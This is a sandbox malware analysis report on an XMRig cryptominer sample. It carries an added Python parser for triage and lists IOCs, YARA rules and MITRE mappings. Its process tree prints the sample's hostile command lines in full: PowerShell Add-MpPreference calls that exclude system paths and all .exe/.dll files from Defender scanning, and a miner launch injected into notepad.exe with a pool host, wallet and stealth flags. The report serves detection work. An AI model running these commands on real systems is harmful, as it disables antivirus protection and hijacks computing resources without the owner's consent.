Windows Analysis Report
9d2h99wrj.exe
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Classification
- System is w10x64
- 9d2h99wrj.exe (PID: 6848, cmdline: "C:\Users\user\Desktop\9d2h99wrj.exe", MD5: 88848246CE109235A762FCD193210CAA)
- conhost.exe (PID: 6896, cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe", MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7124, cmdline: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7136, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6268, cmdline: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force", MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 6644, cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force", MD5: 04029E121A0CFA5991749937DD22A1D9)
- notepad.exe (PID: 7112, cmdline: C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth, MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
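Two parts of the process tree carry the actionable detail. The cmd.exe child runs PowerShell twice: the first Add-MpPreference call excludes the working directory, the user profile, AppData, Temp, SystemRoot, the home drive and the system drive from Windows Defender scanning, the second excludes every .exe and .dll. notepad.exe then runs with XMRig-style arguments (pool.hashvault.pro:443, a 95-character Monero address as --user, --algo="rx/0"), which is consistent with the miner being injected into a benign host process; the --cinit-* options are not upstream XMRig options and indicate a modified build. The Python below is an added example, not code from the report or from XMRig: it takes those two command lines as constructed input and turns them into findings an analyst can assert on. Every function name, the LOLBIN_HOSTS list and the "whole-system" scope heuristic are this example's own assumptions.

```python
"""Added example, not code from the Joe Sandbox report or from XMRig: parse the two
command lines in the process tree above into triage findings. The command lines are
copied from the report; all names and heuristics here are this example's own."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed from the report's process tree: (image name, command line).
PROCESS_TREE = [
    ("cmd.exe",
     '"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath '
     '@(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,'
     '$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command '
     "\"Add-MpPreference -ExclusionExtension @('exe','dll') -Force\" & exit"),
    ("notepad.exe",
     'C:\\Windows/System32\\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto '
     '--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 '
     '--cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 '
     '--user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eq'
     'TF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 '
     '--cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5'
     'KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" '
     '--cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth'),
]

def tokenize_cmdline(cmdline: str) -> list[str]:
    """Split on whitespace outside double quotes; quotes are dropped, backslashes kept."""
    tokens, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens

@dataclass
class DefenderExclusion:
    parameter: str      # ExclusionPath / ExclusionExtension / ExclusionProcess
    values: list[str]

# Add-MpPreference -Exclusion<X> @( ... ), allowing one nested pair for "($pwd).path".
_MP_EXCL = re.compile(r"Add-MpPreference\s+-(Exclusion\w+)\s+@\(((?:[^()]|\([^()]*\))*)\)", re.I)
# Roots whose exclusion effectively stops scanning of the OS or the user's files (assumption).
BROAD_PATH_VARS = {"$env:systemdrive", "$env:homedrive", "$env:systemroot", "$env:userprofile"}

def parse_defender_exclusions(cmdline: str) -> list[DefenderExclusion]:
    found = []
    for tok in tokenize_cmdline(cmdline):     # each -Command "<script>" becomes one token
        for m in _MP_EXCL.finditer(tok):
            values = [v.strip().strip("'") for v in m.group(2).split(",")]
            found.append(DefenderExclusion(m.group(1), values))
    return found

def exclusion_scope(ex: DefenderExclusion) -> str:
    """'whole-system' when all executables or the OS/profile roots stop being scanned."""
    vals = {v.lower() for v in ex.values}
    if ex.parameter.lower() == "exclusionextension" and vals & {"exe", "dll"}:
        return "whole-system"
    if ex.parameter.lower() == "exclusionpath" and vals & BROAD_PATH_VARS:
        return "whole-system"
    return "targeted"

@dataclass
class MinerConfig:
    image: str
    pool_host: str | None = None
    pool_port: int | None = None
    wallet: str | None = None
    password: str | None = None
    algo: str | None = None
    nonstandard_flags: list[str] = field(default_factory=list)

# Monero standard address or subaddress: 95 base58 chars starting with 4 or 8
# (the 106-char integrated form is not handled here).
_XMR_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
# Windows binaries commonly used as injection hosts for miners (assumption for this example).
LOLBIN_HOSTS = {"notepad.exe", "explorer.exe", "svchost.exe", "dllhost.exe"}

def is_monero_address(s: str | None) -> bool:
    return s is not None and _XMR_ADDR.match(s) is not None

def parse_miner_args(image: str, cmdline: str) -> MinerConfig | None:
    """Collect XMRig-style long options (--key=value); None if neither --url nor --user."""
    opts = {}
    for tok in tokenize_cmdline(cmdline)[1:]:
        if tok.startswith("--"):
            key, _, val = tok[2:].partition("=")
            opts[key] = val
    if "url" not in opts and "user" not in opts:
        return None
    cfg = MinerConfig(image=image.lower(), wallet=opts.get("user"),
                      password=opts.get("pass"), algo=opts.get("algo"))
    if "url" in opts:
        hostport = re.sub(r"^\w+(?:\+\w+)?://", "", opts["url"])   # strip stratum+tcp:// etc.
        host, _, port = hostport.rpartition(":")
        cfg.pool_host, cfg.pool_port = host or hostport, (int(port) if port.isdigit() else None)
    # upstream XMRig has no --cinit-* options; their presence marks a modified build
    cfg.nonstandard_flags = sorted(k for k in opts if k.startswith("cinit-"))
    return cfg

def injected_into_host(cfg: MinerConfig) -> bool:
    return cfg.image in LOLBIN_HOSTS

def triage(tree: list[tuple[str, str]]) -> dict:
    exclusions, miners = [], []
    for image, cmdline in tree:
        exclusions += parse_defender_exclusions(cmdline)
        cfg = parse_miner_args(image, cmdline)
        if cfg:
            miners.append(cfg)
    return {"defender_exclusions": exclusions, "miners": miners}
```

Run `triage(PROCESS_TREE)` on the constructed tree: it returns two DefenderExclusion findings, both scored "whole-system", and one MinerConfig for notepad.exe with the pool split into host and port, a syntactically valid Monero address, and the five --cinit-* flags listed as non-standard. The same functions apply unchanged to command lines pulled from Sysmon event 1 or Security event 4688.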
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | | |
Rule | Description | Author |
---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
Table truncated; 57 entries in the full report.
Rule | Description | Author |
---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen |
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Table truncated; 3 entries in the full report.
Bitcoin Miner |
---|
Author: Joe Security |
System Summary |
---|
Author: EagleEye Team |
Author: Florian Roth (Nextron Systems) |
Author: Florian Roth (Nextron Systems) |
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-12T14:19:06.623850+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 49730 | 80.240.16.67 | 443 | TCP |
2025-01-12T14:19:08.414148+0100 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 57699 | 1.1.1.1 | 53 | UDP |
2025-01-12T14:20:10.875041+0100 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 51665 | 1.1.1.1 | 53 | UDP |
- AV Detection
- Bitcoin Miner
- Compliance
- Networking
- System Summary
- Persistence and Installation Behavior
- Hooking and other Techniques for Hiding and Protection
- Malware Analysis System Evasion
- Anti Debugging
- HIPS / PFW / Operating System Protection Evasion
- Language, Device and Operating System Detection
- Lowering of HIPS / PFW / Operating System Security Settings
AV Detection |
---|
Source: | Avira: |
Source: | Virustotal: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Bitcoin Miner |
---|
Source: | File source: | 32 entries (values not preserved) |
Source: | String found in binary or memory: | 6 entries (values not preserved) |
Source: | Binary string: |
Networking |
---|
Source: | Network Connect: | 2 entries (values not preserved) |
Source: | ASN Name: |
Source: | Suricata IDS: | 3 entries (values not preserved) |
Source: | UDP traffic detected without corresponding DNS query: | 2 entries (values not preserved) |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | 8 entries (values not preserved) |
Source: | Network traffic detected: | 48 entries (values not preserved) |
System Summary |
---|
Source: | Matched rule: | 38 entries (rule names not preserved) |
Source: | Code function: | 0_2_00401D58 |
Source: | Code function: | 0_2_00401D18 |
Source: | Code function: | 0_2_004019D8 |
Source: | Code function: | 0_2_00401D98 |
Source: | Code function: | 0_2_00401C98 |
Source: | File created: |
Source: | Dropped File: |
Source: | Matched rule: | 38 entries (rule names not preserved) |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: |
Source: | Mutant created: | 2 entries (values not preserved) |
Source: | File created: |
Source: | Static PE information: |
Source: | WMI Queries: |
Source: | Key opened: |
Source: | Virustotal: |
Source: | ReversingLabs: |
Source: | String found in binary or memory: | 2 entries (values not preserved) |
Source: | Process created: | 12 entries (values not preserved) |
Source: | Section loaded: | 92 entries (values not preserved) |
Source: | File opened: |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Binary string: |
Persistence and Installation Behavior |
---|
Source: | File created: |
Source: | File created (dropped file): |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | 14 entries (values not preserved) |
Source: | Process information set: | 236 entries (values not preserved) |
Malware Analysis System Evasion |
---|
Source: | System information queried: |
Source: | Binary or memory string: |
Source: | Thread delayed: |
Source: | Window / User API: |
Source: | Dropped PE file which has not been started: |
Source: | Thread sleep count: |
Source: | Thread sleep time: |
Source: | Thread delayed: |
Source: | Binary or memory string: |
Source: | Process information queried: |
Source: | Process token adjusted: |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: |
Source: | Process created: |
Source: | Memory allocated: |
Source: | Thread created: |
Source: | NtCreateThreadEx: |
Source: | NtWriteVirtualMemory: |
Source: | NtProtectVirtualMemory: |
Source: | NtClose: |
Source: | NtAllocateVirtualMemory: |
Source: | Memory written: |
Source: | Thread register set: |
Source: | Memory written: |
Source: | Process created: |
Source: | Queries volume information: |
Source: | Code function: | 5_2_000000014031010C |
Source: | Key value queried: |
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 Windows Service | 1 Windows Service | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | Data from Local System | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Side-Loading | 611 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 211 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 121 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 611 Process Injection | NTDS | 121 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
60% | Virustotal | Browse | ||
61% | ReversingLabs | Win64.Trojan.Donut | ||
100% | Avira | HEUR/AGEN.1344832 | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | |||
4% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
pool.hashvault.pro | 192.248.189.11 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
80.240.16.67 | unknown | Germany | 20473 | AS-CHOOPAUS | true | |
192.248.189.11 | pool.hashvault.pro | France | 20473 | AS-CHOOPAUS | false |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1589435 |
Start date and time: | 2025-01-12 14:18:09 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 7s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 9d2h99wrj.exe |
Detection: | MAL |
Classification: | mal100.evad.mine.winEXE@12/11@2/2 |
EGA Information: |
HCA Information: | Failed |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
- Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target notepad.exe, PID 7112 because there are no executed functions
- Not all processes were analyzed, report is missing behavior information
- Report size getting too big, too many NtCreateKey calls found.
Time | Type | Description |
---|---|---|
08:19:02 | API Interceptor | |
08:19:05 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
80.240.16.67 | Get hash | malicious | Python Stealer, Exela Stealer, Xmrig | Browse | ||
Get hash | malicious | Xmrig | Browse | |||
192.248.189.11 | Get hash | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | Browse | ||
Get hash | malicious | Xmrig | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
pool.hashvault.pro | Get hash | malicious | Python Stealer, Exela Stealer, Xmrig | Browse |
Get hash | malicious | Xmrig | Browse |
Get hash | malicious | Xmrig | Browse |
Get hash | malicious | Xmrig | Browse |
Get hash | malicious | Amadey, LummaC Stealer, Vidar, Xmrig | Browse |
Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse |
Get hash | malicious | Xmrig | Browse |
Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse |
Get hash | malicious | Xmrig | Browse |
Get hash | malicious | DarkVision Rat, Xmrig | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
AS-CHOOPAUS | Get hash | malicious | Python Stealer, Exela Stealer, Xmrig | Browse |
Get hash | malicious | I2PRAT | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | FormBook | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | Xmrig | Browse |
Get hash | malicious | Xmrig | Browse |
Get hash | malicious | Unknown | Browse |
AS-CHOOPAUS | Get hash | malicious | Python Stealer, Exela Stealer, Xmrig | Browse |
Get hash | malicious | I2PRAT | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | FormBook | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | Xmrig | Browse |
Get hash | malicious | Xmrig | Browse |
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Get hash | malicious | Python Stealer, Exela Stealer, Xmrig | Browse | ||
Get hash | malicious | PureLog Stealer, Xmrig, zgRAT | Browse | |||
Get hash | malicious | Xmrig | Browse | |||
Get hash | malicious | Xmrig | Browse | |||
Get hash | malicious | Xmrig | Browse | |||
Get hash | malicious | Xmrig | Browse | |||
Get hash | malicious | Xmrig | Browse | |||
Get hash | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | Browse | |||
Get hash | malicious | Blank Grabber, Xmrig | Browse | |||
Get hash | malicious | Xmrig | Browse |
Process: | C:\Windows\System32\conhost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1267 |
Entropy (8bit): | 5.355115896011818 |
Encrypted: | false |
SSDEEP: | 24:ML9E4KQMsXE4Np/E4K9E4KnKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQrHNp/HK9HKnYHKGSI6oPtHTHhA2 |
MD5: | 5B8589D00296CA4291880EAC82B43B1D |
SHA1: | 6C11FD4FCD6B9B3762F048BBF45EE0516BF668B3 |
SHA-256: | F207A0EAD4836653A8CCA1C28C08BB0772EAB1743E7E8136064C31CC3883DD99 |
SHA-512: | A938DDC717A9EF0FCBC4C69813CA409F0E67FF996854A61ED0C2D41FFD06386936A564669C6D50921A2088FC814CE94CA74AF91F0644E5678852BF50E9280BF8 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.34726597513537405 |
Encrypted: | false |
SSDEEP: | 3:Nlll:Nll |
MD5: | 446DD1CF97EABA21CF14D03AEBC79F27 |
SHA1: | 36E4CC7367E0C7B40F4A8ACE272941EA46373799 |
SHA-256: | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
SHA-512: | A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\conhost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 14544 |
Entropy (8bit): | 6.2660301556221185 |
Encrypted: | false |
SSDEEP: | 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ |
MD5: | 0C0195C48B6B8582FA6F6373032118DA |
SHA1: | D25340AE8E92A6D29F599FEF426A2BC1B5217299 |
SHA-256: | 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5 |
SHA-512: | AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D |
Malicious: | true |
Antivirus: |
Joe Sandbox View: |
Preview: |
File type: | |
Entropy (8bit): | 7.999991889029266 |
TrID: |
File name: | 9d2h99wrj.exe |
File size: | 31'161'344 bytes |
MD5: | 88848246ce109235a762fcd193210caa |
SHA1: | 9bbe1f1ef018b4cf4f9b4df15bd0904ab4f2ff5e |
SHA256: | ae9bec259aef6380ed576361d588180e1850742708c24e60dc92fe07d0fb90c9 |
SHA512: | 3a4f5a41631b40bed2224cb4bdffaebd83cf40a8afa775623ecfa019928a1dfcdc749b4dc050dc6dfb54798add3e3d65424383cb37f422df5f79b492891cd999 |
SSDEEP: | 786432:YWC/VCO2W2JqrlTY25R6DTrqBDfIRwwoSPDitdV2jFj3qW3yq:BaVCO12YM25RyeTIRuN2R5i |
TLSH: | FF6733D123DD1175EF4671681E9B8DD6B4BE296CE89AE1C0BFD2131B260DE0E8504EBC |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........b......."........@......................................,..................................... |
Icon Hash: | 90cececece8e8eb0 |
